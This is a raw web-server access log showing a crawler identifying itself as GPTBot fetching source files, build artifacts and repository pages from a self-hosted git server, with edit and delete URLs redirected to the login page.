"/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 16641] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 24126] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:39:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=source" [Client 74.7.227.38] [Length 11971] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:17:39:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:17:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.html" -[17/Feb/2026:17:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 55309] [Gzip 13.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:17:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 57051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:17:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 10036] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:17:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 1352] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:17:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:39:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9854] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71663] [Gzip 21.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9873] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 1003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:39:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fCMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 53585] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.make" [Client 74.7.227.38] [Length 40311] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:17:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.internal" [Client 74.7.227.38] [Length 30677] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:39:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-cpp2.md" -[17/Feb/2026:17:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13012] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12934] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:39:32 +0000] - 200 200 - GET https 